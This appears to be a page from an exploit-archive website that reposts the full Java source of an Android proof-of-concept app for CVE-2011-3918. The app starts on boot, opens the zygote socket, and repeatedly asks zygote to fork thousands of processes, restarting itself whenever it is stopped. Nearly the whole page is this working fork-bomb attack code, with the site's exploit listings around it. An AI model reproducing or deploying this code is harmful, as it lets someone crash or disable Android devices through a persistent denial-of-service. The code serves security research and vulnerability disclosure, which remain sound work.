首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Android Zygote Socket Vulnerability Fork bomb Attack
来源:luca.verderame@unige.it 作者:Verderame 发布时间:2013-10-15  
################# BootReceiver.java ##################
  
/**
 * Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
 *
 * Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
 
 
 * @author Luca Verderame <luca.verderame@unige.it>
 * @version 1.0
 
 * Copyright 2012 Luca Verderame
 
 * This file is part of ZygoteVulnerability.
  
    ZygoteVulnerability is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
  
    ZygoteVulnerability is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
  
    You should have received a copy of the GNU General Public License
    along with ZygoteVulnerability.  If not, see <http://www.gnu.org/licenses/>.
 
 */
  
  
  
package it.ailab;
  
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;
   
public class BootReceiver extends BroadcastReceiver{
      
        @Override
        public void onReceive(Context context, Intent intent) {
              
                Log.d("BOOT","boot completed. starting service");
                Intent intentReceiver = new Intent();
                intentReceiver.setAction("it.ailab.ServiceDOS");
                context.startService(intentReceiver);
        }
}
  
  
################# ServiceDOS.java ##################
  
  
/**
 * Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
 *
 * Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
 
 
 * @author Luca Verderame <luca.verderame@unige.it>
 * @version 1.0
 
 * Copyright 2012 Luca Verderame
 
 * This file is part of ZygoteVulnerability.
  
    ZygoteVulnerability is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
  
    ZygoteVulnerability is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
  
    You should have received a copy of the GNU General Public License
    along with ZygoteVulnerability.  If not, see <http://www.gnu.org/licenses/>.
 
 */
  
  
package it.ailab;
  
  
import java.io.BufferedWriter;
import java.io.DataInputStream;
import java.io.IOException;
import java.io.PrintWriter;
  
import android.app.Service;
import android.content.Intent;
import android.net.LocalSocket;
import android.net.LocalSocketAddress;
import android.os.HandlerThread;
import android.os.IBinder;
import android.util.Log;
  
public class ServiceDOS extends Service{
      
    SocketUtil socketUtil = null;
      
    public boolean connectToZygoteIfNeeded(){
          
        int retry = 0;
        while(((socketUtil == null) || (socketUtil.sZygoteSocket == null)) && retry < 20)
        {
            Log.d("SERV", "connection to socket needed");
            socketUtil = null;
            if (retry > 0) {
                try {
                   Log.d("SERV", "Zygote not up yet, sleeping...");
                   Thread.sleep(500);
                } catch (InterruptedException ex) {
                   // should never happen
                }
            }
            //loading part..
                      
            LocalSocket client = new LocalSocket();
  
            try {
                client.connect(new LocalSocketAddress("zygote",LocalSocketAddress.Namespace.RESERVED));
            } catch (IOException e1) {
                // TODO Auto-generated catch block
                Log.e("SERV","link client error");
                e1.printStackTrace();
            }
              
            if(client != null)
            {
                DataInputStream in = null;
                try {
                    in = new DataInputStream(client.getInputStream());
                } catch (IOException e) {
                    // TODO Auto-generated catch block
                    e.printStackTrace();
                }
                PrintWriter p = null;
                try {
                    p = new PrintWriter(client.getOutputStream());
                } catch (IOException e) {
                    // TODO Auto-generated catch block
                    e.printStackTrace();
                }
                BufferedWriter out = new BufferedWriter(p);
                socketUtil = new SocketUtil(client,in,out);
                Log.d("SERV", "socket connection completed");
            }
            retry++;
        } //fine while
        if(socketUtil != null)
        {
            if(retry > 0)
                Log.d("SERV", "socket connection completed");
            return true;
        }
        return false;
    }
      
      
      
    @Override
      public void onCreate() {
        // Start up the thread running the service.  Note that we create a
        // separate thread because the service normally runs in the process's
        // main thread, which we don't want to block.  We also make it
        // background priority so CPU-intensive work will not disrupt our UI.
        HandlerThread thread = new HandlerThread("ServiceDOS");
        thread.start();     
        connectToZygoteIfNeeded();  
      }
      
    @Override
    public IBinder onBind(Intent intent) {
        // TODO Auto-generated method stub
        onStartCommand(intent,0,0);
        return null;
    }
      
    @Override
      public int onStartCommand(Intent intent, int flags, int startId) {
          
        Log.d("SERV","onStart");
        final int uid = 123456;
        final int gid = 123456;
        final int[] gids = {};
        String[] extraArgs = null; //altrimenti null
  
        String className = "com.android.internal.util.WithFramework";
        //String className = "android.app.ActivityThread";
          
        int res = 0;
        int tr = 0;
        while(tr<10000)
        {
            //String niceName = "DummyProcess" + tr;
              
            connectToZygoteIfNeeded(); 
            try {
                res = socketUtil.startViaZygote(className,null,uid,gid,gids,0,extraArgs);
            } catch (Exception e) {
                // TODO Auto-generated catch block
                Log.e("SERV", "starting error");
                e.printStackTrace();
            }
            //Log.d("SERV", "risultato startViaZygote: " + res);
            Log.d("SERV", "started process #:" +tr);
            tr++;
        }//fine while
          
        //if whe return here -> restart!
        return START_STICKY;
      }
      
    @Override
    public void onDestroy (){
        socketUtil.clean();
        socketUtil = null;
        Log.d("SERV", "service destroyed! trying to restart...");
        Intent intent = new Intent(this, ServiceDOS.class);
        onStartCommand(intent,0,0);
    }
  
}
  
  
################# SocketAndroidActivity.java ##################
  
/**
 * Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
 *
 * Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
 
 
 * @author Luca Verderame <luca.verderame@unige.it>
 * @version 1.0
 
 * Copyright 2012 Luca Verderame
 
 * This file is part of ZygoteVulnerability.
  
    ZygoteVulnerability is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
  
    ZygoteVulnerability is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
  
    You should have received a copy of the GNU General Public License
    along with ZygoteVulnerability.  If not, see <http://www.gnu.org/licenses/>.
 
 */
  
  
package it.ailab;
  
  
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
  
public class SocketAndroidActivity extends Activity {
    /** Called when the activity is first created. */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
  
        Log.d("APP","starting of the service");
        Intent intent = new Intent(this, ServiceDOS.class);
        startService(intent);
        Log.d("APP","service activated");
        this.finish();
          
    }
}
  
  
################# SocketUtil.java ##################
  
  
/**
 * Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
 *
 * Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
 
 
 * @author Luca Verderame <luca.verderame@unige.it>
 * @version 1.0
 
 * Copyright 2012 Luca Verderame
 
 * This file is part of ZygoteVulnerability.
  
    ZygoteVulnerability is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
  
    ZygoteVulnerability is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
  
    You should have received a copy of the GNU General Public License
    along with ZygoteVulnerability.  If not, see <http://www.gnu.org/licenses/>.
 
 */
  
package it.ailab;
  
import java.io.BufferedWriter;
import java.io.DataInputStream;
import java.io.IOException;
import java.util.ArrayList;
  
import android.net.LocalSocket;
  
public class SocketUtil {
      
    static LocalSocket sZygoteSocket = null;
    static DataInputStream sZygoteInputStream = null;
    static BufferedWriter sZygoteWriter = null;
      
    /* versione unixDomainSocket
    static UnixDomainSocketClient sZygoteSocket = null;
    public SocketUtil(UnixDomainSocketClient c, DataInputStream i,BufferedWriter o)
    {
        sZygoteSocket = c;
        sZygoteInputStream = i;
        sZygoteWriter = o;
    }
    */
      
    public void clean()
    {
        try {
            sZygoteSocket.close();
            sZygoteInputStream.close();
            sZygoteWriter.close();
        } catch (IOException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }
        sZygoteSocket = null;
        sZygoteWriter = null;
        sZygoteInputStream = null;
    }
      
    public SocketUtil(LocalSocket c, DataInputStream i,BufferedWriter o)
    {
        sZygoteSocket = c;
        sZygoteInputStream = i;
        sZygoteWriter = o;
    }
      
    /*
     * Starts a new process via the zygote mechanism.
    Parameters:
    processClass Class name whose static main() to run
    niceName 'nice' process name to appear in ps
    uid a POSIX uid that the new process should setuid() to
    gid a POSIX gid that the new process shuold setgid() to
    gids null-ok; a list of supplementary group IDs that the new process should setgroup() to.
    enableDebugger True if debugging should be enabled for this process.
    extraArgs Additional arguments to supply to the zygote process.
    Returns:
    PID
    Throws:
    Exception if process start failed for any reason
     */
      
    public int startViaZygote(final String processClass,
                                              final String niceName,
                                              final int uid, final int gid,
                                              final int[] gids,
                                              int debugFlags,
                                              String[] extraArgs)
                                              throws Exception {
                    int pid;
              
                    synchronized(Process.class) {
                        ArrayList<String> argsForZygote = new ArrayList<String>();
              
                        // --runtime-init, --setuid=, --setgid=,
                        // and --setgroups= must go first
                        argsForZygote.add("--runtime-init");
                       // argsForZygote.add("--setuid=" + uid);
                        //argsForZygote.add("--setgid=" + gid);
                        //argsForZygote.add("--classpath=:data:data:socketAndroid");
                        //argsForZygote.add("data.data.android.socket.a.socket.DummyClass");
                          
                        //opzioni da sistemare eventualmente dopo & Zygote.DEBUG_ENABLE_SAFEMODE, & Zygote.DEBUG_ENABLE_DEBUGGER
                        //& Zygote.DEBUG_ENABLE_CHECKJNI & Zygote.DEBUG_ENABLE_ASSERT
                        if ((debugFlags ) != 0) {
                            argsForZygote.add("--enable-safemode");
                        }
                        if ((debugFlags ) != 0) {
                            argsForZygote.add("--enable-debugger");
                        }
                        if ((debugFlags ) != 0) {
                            argsForZygote.add("--enable-checkjni");
                        }
                        if ((debugFlags ) != 0) {
                            argsForZygote.add("--enable-assert");
                        }
                          
                        //TODO optionally enable debuger
                        //argsForZygote.add("--enable-debugger");
              
                       /*
                        // --setgroups is a comma-separated list
                       if (gids != null && gids.length > 0) {
                            StringBuilder sb = new StringBuilder();
                            sb.append("--setgroups=");
              
                            int sz = gids.length;
                            for (int i = 0; i < sz; i++) {
                                if (i != 0) {
                                    sb.append(',');
                                }
                                sb.append(gids[i]);
                            }
              
                            argsForZygote.add(sb.toString());
                        }
                        */
                        if (niceName != null) {
                            argsForZygote.add("--nice-name=" + niceName);
                        }
              
                        argsForZygote.add(processClass);
              
                        if (extraArgs != null) {
                            for (String arg : extraArgs) {
                                argsForZygote.add(arg);
                            }
                        }
                          
                        pid = zygoteSendArgsAndGetPid(argsForZygote);
                    }
              
                    if (pid <= 0) {
                        throw new Exception("zygote start failed:" + pid);
                    }
              
                   return pid;
    }
      
        private static int zygoteSendArgsAndGetPid(ArrayList<String> args)
                throws Exception {
      
            int pid = 0;
      
            //openZygoteSocketIfNeeded();
      
            try {
                  
    /*See com.android.internal.os.ZygoteInit.readArgumentList() 
        Presently the wire format to the zygote process is: 
        a) a count of arguments (argc, in essence) 
        b) a number of newline-separated argument strings equal to count After the zygote process reads 
            these it will write the pid of the child or -1 on failure.
    */
                sZygoteWriter.write(Integer.toString(args.size()));
                sZygoteWriter.newLine();
      
                int sz = args.size();
                for (int i = 0; i < sz; i++) {
                    String arg = args.get(i);
                    if (arg.indexOf('\n') >= 0) {
                        throw new Exception(
                                "embedded newlines not allowed");
                    }
                    sZygoteWriter.write(arg);
                    sZygoteWriter.newLine();
                }
      
                sZygoteWriter.flush();
      
                // Should there be a timeout on this?
                pid = sZygoteInputStream.readInt();
      
                if (pid < 0) {
                    throw new Exception("fork() failed");
                }
            } catch (IOException ex) {
                    if (sZygoteSocket != null) {
                        sZygoteSocket.close();
                /*
                } catch (IOException ex2) {
                    // we're going to fail anyway
                    Log.e("app","I/O exception on routine close", ex2);
                }
                */
                sZygoteSocket = null;
      
                throw new Exception(ex);
                }
            }
      
            return pid;
        }
  
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Beetel Connection Manager SEH
·MS13-080 Microsoft Internet Ex
·VMware Hyperic HQ Groovy Scrip
·HP Data Protector Cell Request
·Indusoft Thin Client 7.1 Activ
·Zabbix 2.0.8 SQL Injection / R
·ONO Hitron CDE-30364 Router -
·PDFCool Studio Buffer Overflow
·ALLPlayer 5.6.2 (.m3u) - Local
·Aladdin Knowledge Systems Ltd.
·Internet Haut Debit Mobile Buf
·Persistent Payload In Windows
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved